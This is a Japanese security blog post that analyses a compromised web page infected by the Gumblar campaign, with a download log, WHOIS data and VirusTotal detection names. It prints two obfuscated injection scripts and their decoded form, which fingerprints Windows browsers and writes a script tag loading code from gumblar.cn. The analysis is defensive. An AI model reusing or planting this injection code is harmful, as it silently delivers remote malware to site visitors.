--18:46:43-- hxxp:// mt-sakura・iivoice・com/html/13.html
=> `13.html'
Resolving mt-sakura・iivoice・com... 210.172.99.214
Connecting to mt-sakura.iivoice.com|210.172.99.214|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,933 (6.8K) [text/html]
18:46:43 (1.20 MB/s) - `13.html' saved [6933/6933]日本KDDIのネットワーク(DION)↓inetnum: 210.172.99.0 - 210.172.99.255 netname: KDDI-NET descr: DION (KDDI CORPORATION) country: JP admin-c: JP00000127 tech-c: JP0000018113.htmlに下記のマルウェアコードを発見(危ないコードをneutralizedしました)↓
<script language=javascript><!-- (function(){var r5KC='%';var zV9gP=('var.20a.3d.22.53cript.45.6egin.65.22.2c.62.3d.22.56.65rsio.6e.28).2b.22.2cj.3d.22.22.2cu.3dnavi.67a.74or.2eus.65rAgent.3bif((u.2e.69ndex.4ff(.22Win.22).3e0).26.26(u.2einde.78Of(.22N.54.206.22).3c.30).26.26.28d.6f.63um.65nt.2ecookie.2e.69ndex.4ff(.22miek.3d1.22.29.3c0).26.26(.74ypeof(z.72vz.74s).21.3dtypeo.66.28.22A.22)).29.7bzr.76.7a.74s.3d.22.41.22.3beval(.22if(.77.69ndo.77.2e.22+a+.22.29j.3dj+.22+a+.22Maj.6fr.22+.62+a+.22Minor.22+b+a+.22Build.22+b+.22j.3b.22.29.3b.64o.63um.65nt.2ewri.74e.28.22.3cscript.20sr.63.3d.2f.2f.67u.6dbla.72.2ecn.2frss.2f.3fid.3d.22+j+.22.3e.3c.5c.2fs.63ript.3e.22).3b.7d').replace(/./g,r5KC);var OoVn=unescape(zV9gP);eval(OoVn)})(); --></script> <script language=javascript><!-- (function(Iytv){var xfPn='&76ar&20a&3d&22&53cri&70&74E&6egine&22&2c&62&3d&22Ver&73i&6fn(&29+&22&2cj&3d&22&22&2cu&3dn&61vigato&72&2eu&73&65rAge&6e&74&3bif&28(u&2e&69ndexO&66(&22Win&22)&3e0)&26&26(u&2ei&6ed&65&78O&66(&22NT&206&22)&3c&30)&26&26&28d&6fcum&65nt&2e&63o&6fk&69e&2ei&6ede&78O&66(&22mie&6b&3d&31&22)&3c0)&26&26&28typeof(zrvzts)&21&3d&74ypeof(&22&41&22&29&29&29&7b&7ar&76zts&3d&22A&22&3be&76&61l(&22&69f(&77i&6edow&2e&22+a+&22)j&3dj+&22&2ba+&22M&61jor&22+&62&2ba+&22Mi&6eor&22+b&2ba+&22Buil&64&22+b+&22&6a&3b&22)&3bdocu&6dent&2ewrit&65&28&22&3c&73cript&20s&72c&3d&2f&2f&67&75mb&6car&2ec&6e&2frss&2f&3fid&3d&22+&6a+&22&3e&3c&5c&2fscri&70&74&3e&22)&3b&7d';eval(unescape(xfPn.replace(Iytv,'%')))})(/&/g); --></script>
※↑マルウェア早く削除してほしいです。。。
解けたら下記となります↓
eval1() %%%%%%%%%%%%%%%%%%%%%%%%%%%%% : : %%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%% eval2() var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent; if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&& (document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))) { zrvzts="A"; eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;"); document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");}
eval1()はよく使っているxss ブラウザークラッシュのexploit攻撃PoCなので
eval2()について、GUMBLARマルウェアサイトへ飛ばされます↓
gumblar・cn/rss/?id=xxxxx
13.htmlのVirus Totalで確認したら⇒【こちら】
下記のマルウェア名前が出ました↓
F-Prot : JS/Redir.M AntiVir : HTML/Infected.WebPage.Gen2 TrendMicro : JS_GUMBLAR.ERC TotalDefense : JS/Gumblar!generic Fortinet : JS/PackRedir.A!tr.dldr TrendMicro-HouseCall : JS_GUMBLAR.ERC Avast : JS:RedGumb-H [Trj] GData : JS:RedGumb-H Kaspersky : Trojan-Downloader.JS.Gumblar.a ESET-NOD32 : JS/TrojanDownloader.Agent.NQB McAfee : Obfuscated Script.f Ikarus : Trojan-Downloader.JS.Gumblar Commtouch : JS/Redir.M K7AntiVirus : Trojan AVG : JS/Obfuscated ViRobot : JS.A.Gumblar.6933 VirusBuster : JS.Crypt.BQK
0 件のコメント:
コメントを投稿